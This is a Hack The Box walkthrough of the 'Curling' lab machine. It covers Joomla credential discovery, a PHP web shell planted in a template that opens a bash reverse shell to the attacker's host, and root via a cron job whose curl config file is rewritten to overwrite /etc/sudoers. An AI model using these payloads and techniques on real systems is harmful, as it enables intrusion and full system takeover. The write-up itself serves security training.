HTB Walkthrough: Curling (retired)
Curling is a retired box on HTB.
Hostname: Curling | Difficulty Level: Easy | Operating System: Linux
NMAP scan
We can see port 22 and 80 open.
HTTP Enumeration
Browsing to ‘http://10.10.10.150’ reveals ‘Cewl’ curling site. Author of the website is ‘Super User’. It probably hints on utilizing cewl to generate wordlist for brute force. UI’s source code reveals that belongs to Joomla.
Source code also hints at ‘secret.txt’ being present.
Browsing to ‘http://10.10.10.150/secret.txt’ reveals: Q3VybGluZzIwMTgh
Decoding above using online base64 decoder reveals possible password.
One of the posts on ‘http://10.10.10.150’ mentions about ‘-Floris’ at the end as a signature, so username can be ‘floris’. Logging into ‘http://10.10.10.150’ using floris/<base64 decoded password> will get you super user login. Browsing around did not reveal much info.
After running gobuster, browse to ‘http://10.10.10.150/administrator’ and use the same floris/<password> credentials and you will get in.
Whenever there is Joomla, try to edit the template. Go to ‘Extensions >Template > Template’. There will be two templates, select the one starting with ‘protostar..’ as we know the storage path (/templates/protostar) from UI source code of ‘http://10.10.10.150’.
Exploitation
Create a new php file ‘shell.php’ in the protostar template area with below contents:
<?php exec(“/bin/bash -c ‘bash -i >& /dev/tcp/<kali ip>/9876 0>&1’”); ?>
Listen on 9876 using netcat (on kali) and browse to ‘10.10.10.150/templates/protostar/shell.php’ and you will get reverse shell.
www-data@curling:/home/floris$ ls -lrt
ls -lrt
total 12
-rw-r — — — 1 floris floris 33 May 22 2018 user.txt
drwxr-x — — 2 root floris 4096 May 22 2018 admin-area
-rw-r — r — 1 floris floris 1076 May 22 2018 password_backup
‘password_backup’ file contains hex dump.
Privilege Escalation
Below are the steps to converting the file from hex dump to text:
Above can also be achieved via https://gchq.github.io/CyberChef/
Use the obtained password to ssh into host using user ‘floris’. You will get user flag. If you run ‘pspy64s’ on the system, you will see below cron jobs are repeated:
2021/02/06 20:28:01 CMD: UID=0 PID=5916 | /bin/sh -c sleep 1; cat /root/default.txt > /home/floris/admin-area/input
2021/02/06 20:28:01 CMD: UID=0 PID=5915 | /usr/sbin/CRON -f
2021/02/06 20:28:01 CMD: UID=0 PID=5914 | /usr/sbin/CRON -f
2021/02/06 20:28:01 CMD: UID=0 PID=5919 | /bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report
When you ‘man curl’, you will get below related to ‘-K’ option:
-K, — config <file>
Specify a text file to read curl arguments from.
Basically, curl reads arguments from the specified config file (after -K) which are in the form of key-value pair. The target file used by cronjob is ‘/home/floris/admin-area/input ’. We will change the argument ‘url’ from local host to kali machine and make sure ‘SimpleHTTPServer’ is on because you are serving a webpage.
Attack methodology: We will try to serve a file in kali and get it copied to target machine(‘output’ attribute). The file can be any file with desired outcome. For example, I am trying to replace sudoers file. Another Eg. a crontab file with reverse root shell.
Edit ‘/home/floris/admin-area/input’ as below:
url = “http://<kali ip>:8000/sudoers"
output = “/etc/sudoers”
user-agent “Thankyou/1.0”
Note: File ‘/home/floris/admin-area/input’ is overwritten as part of CRON job. So, make sure to check the file contents timely.
From below it is evident that floris is not present in sudoers file. So, we add ‘floris’ in kali’s sudoers file.
floris@curling:/dev/shm$ sudo root
[sudo] password for floris:
floris is not in the sudoers file. This incident will be reported.
Make a copy of current sudoers file (in kali) with below mentioned contents. Add ‘floris’ under root section with ‘ALL’ privileges.
After some time you will see that a request has been sent to the sudoers file as shown below:
kali@kali$ python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 …
10.10.10.150 — — [06/Feb/2021 16:26:34] “GET /sudoers HTTP/1.1” 200 -
Run “sudo su -” to get root access and root flag.
floris@curling:/dev/shm$ sudo su -
Sudo su — means “Switch to another user(su) using root privileges (sudo) but ask for current user’s password with login shell (-). For this case, it will be /root.
